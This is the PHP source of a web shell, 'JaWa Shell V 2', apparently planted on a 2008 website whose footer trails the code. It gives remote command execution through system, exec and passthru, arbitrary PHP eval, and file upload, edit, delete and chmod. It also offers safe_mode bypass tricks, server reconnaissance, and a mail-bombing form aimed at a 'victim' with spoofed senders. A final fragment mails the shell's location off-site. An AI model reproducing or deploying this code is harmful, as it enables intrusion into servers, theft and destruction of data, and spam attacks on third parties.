"" ){ // path & file name $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } //styl functiob function styll_jawa(){ echo "JaWa Shell => "; echo $_SERVER['SERVER_ADDR']; echo "=> By JIKO
[ SheLL JaWa V 2+ ]
"; } function bas_jawa(){ echo "
By JIKO - jalikom@Hotmail.Com
WwW.No-ExPloiT.CoM || WwW.TrYaG.CoM
"; } function get_execution_method(){ if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command){ if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."
"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function table_info(){ echo '
Server Info :
'; $SA1=@ini_get("safe_mode"); if ($SA1 or strtolower($SA1) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe_mode : $hsafemode"); echo '
'; $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} echo("Open base dir : $hopenbasedir"); echo("
"); echo "Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";} else{echo "$df";} echo("
"); $lol = @substr($SERVER_SOFTWARE,0,120); echo ("Software : $lol"); echo '
'; $os = php_uname(); echo ("server : $os"); echo '
'; $user = exec('id'); echo ("user : $user"); echo '
'; $dir = @getcwd(); echo ("pwd : $dir"); echo("
"); echo "Your ip : ".$_SERVER["REMOTE_ADDR"]."
Server ip : ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF";} echo("
"); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo("
"); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo("
"); echo "PHP version: ".@phpversion().""; echo("
"); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo("
"); echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); print"
";print "Home-path : " .__file__; echo "
"; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "
SeLeCT DriVeR:"; for ($j=ord('C'); $j<=ord('Z'); $j++) if (@$dh = opendir(chr($j).":/")) echo " [".chr($j)."]"; } echo "
"; } function coder_jiko(){ echo"

"; } if (ini_get('register_globals') != '1') { /* We'll register the variables as globals: */ if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS); if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS); if (!empty($HTTP_SERVER_VARS)) extract($HTTP_SERVER_VARS); } @set_time_limit(0); $string = $_SERVER['QUERY_STRING']; $mhost = 'jiko=shell'; $host_all = explode("$mhost", $string); $s1 = $host_all[0]; $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost; // echo styll_jawa(); echo '
'; echo table_info(); echo "
"; if ($jiko=="" or $jiko=="shell"){ @set_time_limit(0); $string = $_SERVER['QUERY_STRING']; $mhost = 'jiko=shell'; $host_all = explode("$mhost", $string); $s1 = $host_all[0]; $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost; // Java Script echo ""; // End JavaScript /* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; } if (@$_GET['chdir']) { $chdir = $_GET['chdir']; } else { $chdir = getcwd()."/"; } if (@chdir("$chdir")) { $msg = "Entrance in the directory, OK!"; } else { $msg = "Error to enters it in the directory!"; $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); } $chdir = str_replace(chr(92), chr(47), $chdir); if (@$_GET['action'] == 'upload') { $uploaddir = $chdir; $uploadfile = $uploaddir. $_FILES['userfile']['name']; if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) { $msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully."; } else { $msg = "Error when copying archive."; } } elseif (@$_GET['action'] == 'mkdir') { $newdir = $_GET['newdir']; if (@mkdir("$chdir"."$newdir")) { $msg = "{$newdir}, directory created successfully."; } else { $msg = "Error to it creates directory."; } } elseif (@$_GET['action'] == 'newfile') { $newfile = $_GET['newfile']; if (@touch("$chdir"."$newfile")) { $msg = "{$newfile}, created successfully!"; } else { $msg = "Error to tries it creates archive."; } } elseif (@$_GET['action'] == 'del') { $file = $_GET['file']; $type = $_GET['type']; if ($type == 'file') { if (@unlink("$chdir"."$file")) { $msg = "{$file}, successfully excluded archive!"; } else { $msg = "Error to it I excluded archive!"; } } elseif ($type == 'dir') { if (@rmdir("$chdir"."$file")) { $msg = "{$file}, successfully excluded directory!"; } else { $msg = "Error to it I excluded directory!"; } } } elseif (@$_GET['action'] == 'chmod') { $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; if (@chmod ("$file", $chmod)) { $msg = "Chmod of {$_GET['file']} moved for $chmod successfully."; } else { $msg = 'Error when moving chmod.'; } } elseif (@$_GET['action'] == 'rename') { $file = $_GET['file']; $newname = $_GET['newname']; if (@rename("$chdir"."$file", "$chdir"."$newname")) { $msg = "Archive {$file} named for {$newname} successfully!"; } else { $msg = "Error to it nominates archive."; } } elseif (@$_GET['action'] == 'copy') { $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; if (@copy("$file", "$copy")) { $msg = "{$file}copied for {$copy} successfully!"; } else { $msg = "Error when copying {$file} for {$copy}"; } } /* Parte Atualiza 02:48 12/2/2006 */ elseif (@$_GET['action'] == 'cmd') { if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } $cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= "

Results: ".$cmd."

"; if ($result_arr) { while ($acom <= $afim) { $msg .= "

 ".@$result_arr[$acom]."

"; $acom++; } } else { $msg .= "

Erro ao executar comando.

"; } } elseif (@$_GET['action'] == 'safemode') { if (@!extension_loaded('shmop')) { echo "Loading... module
"; if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); } } if (@extension_loaded('shmop')) { echo "Module: shmop loaded!
"; $shm_id = @shmop_open(0xff2, "c", 0644, 100); if (!$shm_id) { echo "Couldn't create shared memory segment\\n"; } $data="\\x00"; $offset=-3842685; $shm_bytes_written = @shmop_write($shm_id, $data, $offset); if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\n"; } if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } echo passthru("id"); shmop_close($shm_id); } else { echo "Module: shmop not loaded!
"; } } elseif (@$_GET['action'] == 'zipen') { $file = $_GET['file']; $zip = @zip_open("$chdir"."$file"); $msg = ''; if ($zip) { while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\\n"; zip_entry_close($zip_entry); } echo "\\n"; } zip_close($zip); } } elseif (@$_GET['action'] == 'edit') { $file = $_GET['file']; $conteudo = ''; $filename = "$chdir"."$file"; $conteudo = @file_get_contents($filename); $conteudo = htmlspecialchars($conteudo); $back = $_SERVER['HTTP_REFERER']; echo "

Editing {$file} ...

"; echo ""; echo ""; echo ""; echo ""; echo "
"; echo "
"; echo "

"; print "

"; echo "

"; echo " "; echo " "; echo "

"; echo "
"; } elseif (@$_GET['action'] == 'save') { $filename = "$chdir".$_GET['file']; $somecontent = $_POST['S1']; $somecontent = stripslashes(trim($somecontent)); if (is_writable($filename)) { @$handle = fopen ($filename, "w"); @$fw = fwrite($handle, $somecontent); @fclose($handle); if ($handle && $fw) { $msg = "{$_GET['file']}edited successfully!"; } } else { $msg = "{$_GET['file']}, cannot be written!"; } } // Information $cmdget = ''; if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } $cmdget = htmlspecialchars($cmdget); function asdads() { $asdads = ''; if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } return $asdads; } echo "
PWD
"; echo "
"; echo "
"; echo "Information"; echo ""; echo ""; // Dir echo ""; echo "
"; if (is_writable("$chdir")) { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo "Dir YES: {$chdir} - [New Dir] [New File] [Remote Access]"; } else { echo "Dir YES: {$chdir} - [New Dir] [New File] [BackTool]"; } } else { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo "Dir NO: {$chdir} - [New Dir] [New File] [Remote Access]"; } else { echo "Dir NO: {$chdir} - [New Dir] [New File] [BackTool]"; } } if (@!$handle = opendir("$chdir")) { echo " I could not enters in the directory, click here! for return to the original directory!
"; } else { echo "
"; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; } else { echo "

$msg"; } echo "

"; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; $colorn = 0; while (false !== ($file = readdir($handle))) { if ($file != '.') { if ($colorn == 0) { $color = "style=\"background-color: #333333\""; } elseif ($colorn == 1) { $color = "style=\"background-color: #000000\""; } if (@is_dir("$chdir"."$file")) { $file = $file.'/'; $mode = 'chdir'; } else { $mode = 'edit'; } if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { $chdir .= '/'; } if ($file == '../') { $lenpath = strlen($chdir); $baras = 0; for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } $chdir_ = explode("/", $chdir); $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); } $perms = @fileperms ("$chdir"."$file"); if ($perms == '') { $perms = '???'; } $size = @filesize ("$chdir"."$file"); $size = $size / 1024; $size = explode(".", $size); if (@$size[1] != '') { $size = $size[0].'.'.@substr("$size[1]", 0, 2); } else { $size = $size[0]; } if ($size == 0) { if ($mode == 'chdir') { $size = '???'; } } echo ""; echo ""; if (@is_writable ("$chdir"."$file")) { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } else { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (@is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } echo ""; if ($mode == 'edit') { echo ""; } else { echo ""; } echo ""; if ($colorn == 0) { $colorn = 1; } elseif ($colorn == 1) { $colorn = 0; } } } closedir($handle); } $did=getcwd(); echo << File Upload
 Upload:"; echo " "; echo "
 
"; if (@!$msg) { echo "

Messages

 
 Perms File  Size  Commands
 $perms $file $file $file $file $file $file $file $file $size KB [Rename] [Del] [Chmod] [Copy] [Rename] [Del] [Chmod] [Copy]
$tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "File uploaded $uploadfile\n"; echo "here name :" .$_FILES['file']['name']. "\n"; echo "siza :" .$_FILES['file']['size']. "\n"; } else { print "Not uploaded:\n"; print_r($_FILES); } } echo "
your file:
path upload:
"; }elseif($jiko=="phpinfo"){ echo phpinfo(); }elseif($jiko=="coder"){ echo "

"; } } }elseif($jiko=="read"){ ?>

fread


" ?>

readfile


"; echo ' ' ?>

Copy


"; echo' ' ?>

Ini_restore


"; echo ' ' ?>




fread :

'; $var = fopen("" . $fread . "", "r"); $content = fread($var, filesize("" . $fread . "")); echo ""; } if (isset($_POST['readfile'])) { $readfile = $_POST['readfile']; echo '

readfile :

'; echo ""; } if (isset($_POST['copy'])) { $copy = $_POST['copy']; $file2 = $_POST['file2']; echo '

Copy :


'; if (file_exists("$file2")) { echo "the file $file exist"; } else { copy("$copy","$file2"); $xfile = basename("$file2"); echo 'To read de file please click here'; } } ?>
ÇáãáÝ " ; echo "
"; } ?>

For SEND MAIL LOOL

" ; echo "
Victim Mail :

Number-Mail :

Comments:

"; //send Storm Mail $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ){ for ($i = 1; $i <= $nom ; $i++){ $from = rand (71,1020000000)."@"."Attacker.com"; $subject= md5("$from"); mail($to,$subject,$Comments,"From:$from"); echo "$i is ok"; } echo ""; } }elseif($jiko=="phpeval"){ echo <<PHP Eval $tend HTML; if (isset($_POST['ephp'])){ eval(stripslashes($_POST['ephp'])); } }elseif($jiko=="sqlread"){ ?>
Command:
HOST :
 DataBase Name :   Username :
 Password :

File Path :

"; if(isset($_REQUEST['command'])) { print "
";
execute_command(get_execution_method(),$_REQUEST['command']);
}
}elseif($jiko=="chmod"){
print "
ADD YOUR FILE AND GET THE PERMISSION
";
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "Real Path and name of file";
}

print "
NAME OF FILE:

New permission:
 ";
}elseif($jiko=="infog"){
echo "






Shell JAWA V 2


Coded By jiko


Gr33tz


Kil1er  JIKI TEAM (jiko+kil1er)


No-ExploiT.CoM ==> ALL MEMBERS


Tryag-TEAM===> Gold_M AND ALL MEMBERS Tryagi


HacktecH.OrG TEAm====> Gold-ZerO Hcj AND ALL MEMBERS


Ghost-hacker== Stack == houssamix == toxic350


jalikom[at]hotmail[dot]com

WWW.no-exploit.CoM





";
}



//function bas shell jawa
echo bas_jawa();
?>
";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);
    
    echo "";
    exit;
}
?>
 
Home     Details     F.A.Q.      Join Now      Login      Contact
Copyright © Matrix Results 2008
Powered by Big Money Now